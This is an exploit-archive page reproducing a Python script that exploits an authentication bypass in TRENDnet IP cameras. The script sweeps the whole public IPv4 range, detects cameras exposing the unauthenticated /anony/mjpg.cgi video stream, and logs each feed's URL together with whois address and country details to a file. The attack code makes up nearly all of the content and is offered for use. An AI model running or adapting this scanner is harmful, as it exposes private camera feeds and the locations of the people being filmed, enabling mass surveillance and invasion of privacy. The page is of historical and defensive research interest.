首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
TRENDNet IP Cam Authentication Bypass Vulnerability
来源:http://snakingmax.blogspot.com/ 作者:SnakingMax 发布时间:2013-04-12  
# Exploit Title: TRENDNet IP Cam Magic URL Searcher.
 # Date: [10/04/2013]
 # Author: [SnakingMax]
 # Website: http://snakingmax.blogspot.com/
# Category: [Remote Exploit]
  
  
# Vulnerability description:
# Bypass the TRENDNet IP Cam authentication protection by ussing a magic url ^.^
#
# Software Description:
# This software scans Internet to find TRENDNet IP vulnerable cams.
 
from struct import *
from socket import *
from http.client import HTTPConnection
import urllib.request
import subprocess
 
 
def isPublicIP(ip):
 #This method responses True if is a public IP or False in otherwise.
 f = unpack('!I',inet_pton(AF_INET,ip))[0]
 private = (["127.0.0.0","255.0.0.0"],["192.168.0.0","255.255.0.0"],["172.16.0.0","255.240.0.0"],["10.0.0.0","255.0.0.0"])
 
 for net in private:
  mask = unpack('!I',inet_aton(net[1]))[0]
  p = unpack('!I',inet_aton(net[0]))[0]
  if (f & mask) == p:
   return False
  return True
  
 
def isPublicWebcam(ip):
 #This method responses True if the IP is a webcam or False in otherwise.
 try:
  conn = HTTPConnection(ip, 80, timeout=5)
  conn.request('GET', "/anony/mjpg.cgi")
  response = conn.getresponse()
  if (response.info()["content-type"] == 'multipart/x-mixed-replace;boundary=myboundary'):
   response.close()
   conn.close()
   return True
  response.close()
  conn.close()
  return False
 except Exception as E:
  return False
  response.close()
  conn.close()
 
 
def addThisCamToMyList(camIP):
 #This method save data into a file called CamList.txt
 camlist = open("CamList.txt", "at")
 camlist.write("------------------------WEBCAM------------------------\n")
 
 #Saving URL.
 camlist.write("    URL: http://"+camIP+"/anony/mjpg.cgi\n")
  
 #Getting and writting whois Information about the cam ip.
 whoisInfo = subprocess.check_output(["whois", camIP])
 whoisList = str(whoisInfo).split("\\n")
 #Getting and writting address information.
 for i in whoisList:
  if (i.count("address")>0):
   camlist.write("    ADDRESS:\n")
   camlist.write(i[8:]+"\n")
 #Getting and writting country Information.
 for i in whoisList:
  if (i.count("country")>0):
   camlist.write("    COUNTRY:\n")
   print(i[:8]+"\n")
   break
 camlist.write("------------------------------------------------------\n")
 camlist.close()
 
 
 
if ( (__name__)=="__main__" ):
 #Generating IP address.
 for a in reversed(range(256)):
  for b in reversed(range(256)):
   for c in reversed(range(256)):
    for d in range(1,255):
     generatedIP = str(a)+"."+str(b)+"."+str(c)+"."+str(d)
     #Check if generated IP is public.
     if(isPublicIP(generatedIP)):
      print("Testing IP: "+generatedIP)
      #Check if the IP is a webcam.
      if (isPublicWebcam(generatedIP)):
       print(generatedIP + " is a webcam ;-)")
       #Saving data about the camera into a file.
       addThisCamToMyList(generatedIP)

#       ____              _    _             __  __
#      / ___| _ __   __ _| | _(_)_ __   __ _|  \/  | __ ___  __
#      \___ \| '_ \ / _` | |/ / | '_ \ / _` | |\/| |/ _` \ \/ /
#       ___) | | | | (_| |   <| | | | | (_| | |  | | (_| |>  <    ____
#  ____|____/|_| |_|\__,_|_|\_\_|_| |_|\__, |_|  |_|\__,_/_/\_\__/ O  \___/
# <\x41\x41\x41\x41\x41\x41\x41\x41\x41|___/\x41\x41\x41\x41\x41______/   \

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·DLink DIR-645 / DIR-815 diagno
·ircd-hybrid 8.0.5 Denial Of Se
·Adobe ColdFusion APSB13-03 Rem
·MongoDB nativeHelper.apply Rem
·Linksys WRT54GL apply.cgi Comm
·Ruby Gem kelredd-pruview 0.3.8
·BigAnt Server 2.97 - DDNF User
·Nagios Remote Plugin Executor
·Sysax Multi Server 6.10 - SSH
·KNet Web Server 1.04b - Stack
·Google AD Sync Tool Vulnerabil
·AT-TFTP Server 2.0 - Stack Bas
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved